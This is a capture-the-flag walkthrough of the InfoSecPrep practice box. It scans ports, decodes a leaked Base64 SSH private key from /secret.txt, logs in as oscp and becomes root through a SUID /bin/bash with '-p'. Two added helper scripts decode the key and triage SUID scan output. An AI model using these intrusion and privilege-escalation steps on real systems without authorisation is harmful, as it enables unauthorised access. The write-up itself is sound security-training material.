PG — InfoSecPrep — Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article walks you through the InfoSecPrep box, produced by FalconSpy and hosted on Offensive Security's Proving Grounds. Anyone with access to VulnHub or to Offensive Security's Proving Grounds Play or Practice can try to pwn this Linux box. It is a boot2root machine, easy and fun. Hope you enjoy reading the walkthrough!
As we are already provided with the IP address of the box, we start by scanning it with Nmap.
We first run Nmap against its default set of the 1,000 most common TCP ports. After a short wait the results come back and show two open ports, 22 (SSH) and 80 (HTTP).
To gather more information on the ports Nmap found, we rerun it against just those ports with two extra arguments: -sV probes each open port for the service name and version, and -sC runs Nmap's default script set (banner grabbing, HTTP title, robots.txt and similar checks) to enumerate each service further. The default scripts are enumeration helpers, not a vulnerability scan.
nmap -p 22,80 192.168.x.x -sV -sC
The results arrive shortly and give us more detail on the open ports. We decide to start with port 80: SSH on port 22 offers very little attack surface without credentials, whereas an HTTP server offers a broad one. Moreover, the default scripts already surfaced a path named /secret.txt, which tells us where to look first.
We open our browser and go to the IP address of the box.
The site runs the WordPress CMS. Before enumerating it further, we check /secret.txt, since it appeared in the Nmap output.
We come across an encoded string. It ends with two equals signs, which is the padding Base64 adds when the input length is not a multiple of three bytes, a strong hint that the string is Base64-encoded.
We curl the URL to get the string in our terminal.
Then we curl it again, this time piping the output through the base64 command with the -d argument to decode it:
curl http://192.168.x.x/secret.txt | base64 -d
The decoded output is an SSH private key (a PEM block with a BEGIN ... PRIVATE KEY header), which is probably our way to a low-privilege shell on the machine.
We enumerate the site further to find candidate usernames. A note on the homepage says that the only user on the box is oscp.
We save the decoded private key to a file and restrict its permissions with chmod 600, because ssh refuses to use a key file that other users can read. Then we try to log in to the box as the oscp user.
Now we are ready to connect to the box with the following command:
ssh -i private.key oscp@192.168.x.x
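The fetch, decode, chmod and connect steps above can be wrapped so that the key file is only written when the server actually returned a Base64-encoded PEM key. The script below is an added example, not part of the original walkthrough; the function name decode_ssh_key and the sample blob are constructed for illustration, and the host, path and user in the commented curl line are the ones used in this write-up.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): turn the base64 blob served at
# /secret.txt into a usable SSH key file without trusting the server's output blindly.
set -eu

# decode_ssh_key OUTFILE
#   Reads base64 text on stdin, decodes it, verifies the result is a PEM private key,
#   and writes it to OUTFILE with mode 600 (ssh rejects keys readable by others).
#   Returns 1 and leaves no file behind if the input is not base64 or not a key.
decode_ssh_key() {
    out=$1
    tmp=$(mktemp)
    # strip whitespace and newlines so a line-wrapped copy of the blob still decodes
    tr -d ' \t\r\n' > "$tmp.b64"
    if ! base64 -d < "$tmp.b64" > "$tmp" 2>/dev/null; then
        rm -f "$tmp" "$tmp.b64"
        echo "decode_ssh_key: input is not valid base64" >&2
        return 1
    fi
    rm -f "$tmp.b64"
    # a private key is a PEM block; anything else (an HTML error page, the wrong file) is rejected
    if ! grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$tmp"; then
        rm -f "$tmp"
        echo "decode_ssh_key: decoded data is not a PEM private key" >&2
        return 1
    fi
    chmod 600 "$tmp"
    mv "$tmp" "$out"
}

# Constructed sample standing in for secret.txt: a placeholder PEM body, base64-encoded.
# This is NOT a real key. On the box the input comes from curl instead, e.g.
#   curl -s http://192.168.x.x/secret.txt | decode_ssh_key private.key \
#     && ssh -i private.key oscp@192.168.x.x
SAMPLE_B64=$(printf '%s\n' \
    '-----BEGIN OPENSSH PRIVATE KEY-----' \
    'cGxhY2Vob2xkZXItYm9keS1ub3QtYS1yZWFsLWtleQ==' \
    '-----END OPENSSH PRIVATE KEY-----' | base64)

demo_dir=$(mktemp -d)
printf '%s\n' "$SAMPLE_B64" | decode_ssh_key "$demo_dir/private.key"
ls -l "$demo_dir/private.key"          # -rw------- : ready for ssh -i
head -n 1 "$demo_dir/private.key"      # -----BEGIN OPENSSH PRIVATE KEY-----
```

The two rejection paths matter in practice: a server that answers with a 404 page or a login redirect still produces output that base64 -d will happily mangle, and a key file with loose permissions is silently ignored by ssh with an "UNPROTECTED PRIVATE KEY FILE" warning.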
We successfully connect to the box and collect the low-privilege flag.
While checking for common vulnerabilities and misconfigurations, we list the SUID binaries on the system and find that /bin/bash has the SUID bit set. A SUID-root shell is a serious misconfiguration and gives us a direct route to escalate our privileges:
find / -perm -u=s -type f 2>/dev/null
For SUID binaries we generally check GTFOBins, which catalogues privilege escalation techniques for a large number of common binaries when they carry the SUID bit.
For bash, the entry shows that we only need to run it with the -p argument. Without -p, bash notices that its effective UID differs from its real UID and resets the effective UID to the real one, throwing away the privilege the SUID bit granted; -p (privileged mode) keeps it.
So, we execute the command as follows: /bin/bash -p
Our effective UID and GID are now 0 (root) while the real UID is still oscp, which id reports as euid=0(root) egid=0(root).
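On a real engagement the find command returns dozens of paths, most of them binaries that are SUID root on every Linux system. The script below is an added example, not part of the original walkthrough: it filters the find output against a baseline of normally-SUID binaries so that an entry like /bin/bash stands out. The baseline list is an assumption based on a stock Debian/Ubuntu install, and the sample path list is constructed for the demonstration rather than taken from InfoSecPrep.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): triage the output of a SUID scan so
# that an unexpected entry such as /bin/bash stands out from the binaries that are SUID
# root on every system anyway.
set -eu

# suid_triage
#   Reads file paths on stdin (one per line) and prints only those whose basename is
#   not in a baseline of binaries that are normally SUID root. The baseline is an
#   assumption based on a stock Debian/Ubuntu install; tune it for the target.
suid_triage() {
    baseline=" passwd su sudo mount umount chsh chfn gpasswd newgrp pkexec fusermount fusermount3 ssh-keysign "
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case "$baseline" in
            *" $name "*) ;;                # expected on a normal box, skip
            *) printf '%s\n' "$path" ;;    # anything else deserves a look on GTFOBins
        esac
    done
    return 0
}

# suid_scan
#   The live version: -perm -4000 is the numeric spelling of the -perm -u=s used in the
#   walkthrough. Not called here because it walks the whole filesystem.
suid_scan() {
    find / -perm -4000 -type f 2>/dev/null | suid_triage
}

# Constructed sample output of the find command on a hypothetical box
# (not InfoSecPrep's actual list).
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/bin/bash
/usr/bin/su
/usr/bin/find
/usr/bin/mount'

printf '%s\n' "$SAMPLE_SUID" | suid_triage
# prints /bin/bash and /usr/bin/find; both have SUID entries on GTFOBins
# (/bin/bash -p keeps euid=0 where a plain /bin/bash would drop it).
```

Matching on the basename rather than the full path keeps a relocated standard binary (for instance sudo under /usr/local/bin) from being flagged, at the cost of missing a malicious copy that borrows a legitimate name; if that trade-off worries you, compare owner and package membership of the flagged files as a second step.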
So, we get our root flag.
Now we have full authority on the box. Enjoy!
Further reading and references:
Basic Linux Privilege Escalation
Nmap: the Network Mapper - Free Security Scanner
Proving Grounds Play and Practice | Offensive Security
bash | GTFOBins
Blog Tool, Publishing Platform, and CMS - WordPress
Base64 - Wikipedia
curl: command line tool and library for transferring data with URLs
Pipe, Grep and Sort Command in Linux/Unix with Examples
Secure Shell Protocol - Wikipedia
Penetration Testing with Kali Linux (PWK) | Offensive Security